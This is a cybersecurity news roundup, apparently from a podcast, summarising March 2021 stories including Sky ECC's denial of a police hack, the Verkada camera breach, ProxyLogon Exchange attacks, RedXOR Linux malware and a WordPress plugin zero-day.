Raided phone network Sky ECC says no, police didn’t break our encryption
On Wednesday, European police said they had arrested at least 80 people and carried out hundreds of raids after having shut down an encrypted phone network favored by crooks. The police claimed to have hacked into the Sky ECC network, then “[looked] over the shoulders” of suspects as they used customized devices to plot drug deals and murders. However, Sky ECC says it’s a pack of lies. Sky, which says it offers the “most secure messaging platform you can buy,” claims that an image from a Europol press release that supposedly depicts the app in use on a mobile device is actually from an “imposter” and a “disgruntled” former reseller and that allegations of the “crack or hack” of its encrypted communication software are “false allegations.”
(ZDNet)
‘Even 20-year-old interns’ could watch unsecured webcam feeds
Earlier this week, we reported that the feeds from more than 150,000 Internet-connected surveillance cameras from Verkada turned into a veritable gift to eavesdroppers thanks to “Super Admin” account credentials having been posted online. Well, it turns out that those admin credentials were widely shared within the company itself. According to a former, senior employee, more than100 Verkada employees, including 20-year-old interns, had access to the cameras. Even before a hacktivist collective stumbled across the admin credentials and got access to the cameras, the employees could view thousands of feeds from Tesla factories, police stations, gyms, schools, jails, and hospitals.
Russia blocks itself by mistake
Russia on Wednesday began purposefully slowing down access to Twitter, claiming that the platform had failed to delete posts that illegally urged children to take part in anti-Kremlin protests. However, it seems that the powers that be shot themselves in their own foot. Within hours of the announcement about slowing down Twitter access, the government’s own sites, including Kremlin.ru, were dead in the water. Observers say that one explanation for the censorship spill-over may be this: when the Russian government tried to block t.co, Twitter’s link-shortening service, it accidentally blocked any site including the characters “t.co.”
Deep fakes coming soon from Russian & Chinese hackers, FBI warns
Malicious use of deep fakes is “almost certainly” coming to our shores, and soon, the FBI is warning. The bureau on Wednesday issued an alert saying that foreign actors are already using synthetic content at home, in their own influence campaigns, and that they’ll increasingly use it for spearphishing and social engineering in the US. The bureau pointed to private-sector research that has uncovered Chinese-language and Russian use of manipulated media in disinformation operations, CyberScoop reports. In one case, a pro-Chinese government influence operation dubbed “Spamouflage Dragon” has camouflaged itself with profile images generated by AI.
Thanks to our episode sponsor, Trend Micro
FBI & CISA warn that ProxyLogon exploit will fuel heinous attacks
The government says the ProxyLogon exploit is as serious as they come. On Wednesday, the FBI and CISA—that’s the U.S. Cybersecurity and Infrastructure Security Agency—issued a joint advisory warning that vulnerabilities in Microsoft Exchange on-premises products are actively being exploited by nation-state actors and cybercriminals. They said that the vulnerabilities can be exploited to compromise networks, steal information, encrypt data for ransom, execute a destructive attack, or to sell access to compromised networks. Tens of thousands of entities, including the European Banking Authority and the Norwegian Parliament, are believed to have already been inflicted with a web-based backdoor called the China Chopper web shell that gives attackers the ability to plunder email inboxes and remotely access the target systems.
New Linux malware tied to old lineup of Chinese state hackers
Researchers have spotted a new Linux malware currently being used in ongoing attacks against both Linux servers and endpoints. The researchers, who are with the Linux threat protection firm Intezer, have named the new malware RedXOR and have linked it to a loosely affiliated collection of hacking groups sponsored by China and known by various names, including Winnti, BARIUM, APT41, Blackfly, Suckfly, and Wicked Panda. The Linux backdoor is being used to target both Linux servers and endpoints. The threat actors have been around since at least 2011, when Kaspersky discovered Winnti’s Trojan on a massive number of compromised gaming systems.
World braces for 2nd wave of Exchange attacks
Security experts are already bracing for “Stage 2” of Exchange server attacks, when all the hacked servers get seeded with malware that will let hackers crawl even deeper into their networks. Security reporter Brian Krebs notes that researchers are now “racing to identify, alert and help victims, and hopefully prevent further mayhem.” Earlier this month, Krebs reported that at least 30,000 organizations in the US and hundreds of thousands globally had been hacked. One complicating factor is that many victims may have more than one type of backdoor installed. Some victims have had three web shells installed, one source told Krebs, while another has been inflicted with eight distinct backdoors.
Critical WordPress plugin bug being exploited in the wild
A critical bug in a popular plugin for WordPress has been letting attackers quickly, easily, remotely take over websites. The developer of the addon, which is called Plus Addons for Elementor, says it has more than 30,000 active installations. It enables site owners to create widgets for users, including user logins and registration forms, that can be added to a page built with the Elementor site-building tool. Researchers at Wordfence said this week that the zero-day is a privilege-escalation and authentication-bypass issue in the plug-in’s registration form function. The vulnerability is a bad one, rated at 9.8 on the CVSS vulnerability scale, and is being actively exploited in the wild.